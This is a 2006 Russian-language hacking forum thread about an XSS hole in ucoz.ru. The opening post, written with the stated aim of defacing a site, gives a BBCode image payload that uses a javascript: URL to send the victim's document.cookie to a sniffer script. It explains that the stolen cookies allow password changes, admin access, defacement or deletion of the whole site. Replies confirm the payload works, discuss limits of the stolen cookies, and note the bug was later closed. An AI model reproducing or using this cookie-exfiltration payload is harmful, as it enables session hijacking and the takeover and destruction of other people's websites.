ucoz.ru

Discussion in 'Уязвимости' started by Zadoxlik, 3 Apr 2006.

Thread Status:
Not open for further replies.
  1. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    758
    Likes Received:
    216
    Reputations:
    257
    Просто была необходимость задефейсить один сайтик на укоз.ру

    [img ]javascript:document.images%5b0%5d.src=%22http://snif/sniffer.php?%22+document.cookie[/img]

    Вот уязвимость хсс для интернет эксплорер. С помощью полученных кук можно сменить пароль жертвы (и вообще все настройки аккаунта), пройти в любой раздел,(админка,добавка/редактирование новостей и все остальное - зависит от того чьи куки стыбрил), ну а с этим легко можно сделать дефейс или снести просто весь сайт.
     
    #1 Zadoxlik, 3 Apr 2006
    Last edited: 3 Apr 2006
  2. Antony_

    Antony_ New Member

    Joined:
    2 Apr 2006
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Спасибо огромное. Всё работает!
    Кстати, никто не знает...каким образом шифруется там пароль...
    p.s. Только в админку попасть вроде как нельзя. т.к. приходят куки от форума(сайта), но не от аккакунта. А это два разных пасса.
    Либо я чего - то не понимаю?
     
    #2 Antony_, 5 Apr 2006
    Last edited: 6 Apr 2006
  3. D1ma

    D1ma New Member

    Joined:
    10 May 2005
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    При замене своих кук полученными,не заходит Админом :(
     
  4. Antony_

    Antony_ New Member

    Joined:
    2 Apr 2006
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Заходит, но только на форум(у меня покрайне мере так ?
    А что менял? Какие значения?
     
  5. Antony_

    Antony_ New Member

    Joined:
    2 Apr 2006
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Багу прикрыли :(
     
Thread Status:
Not open for further replies.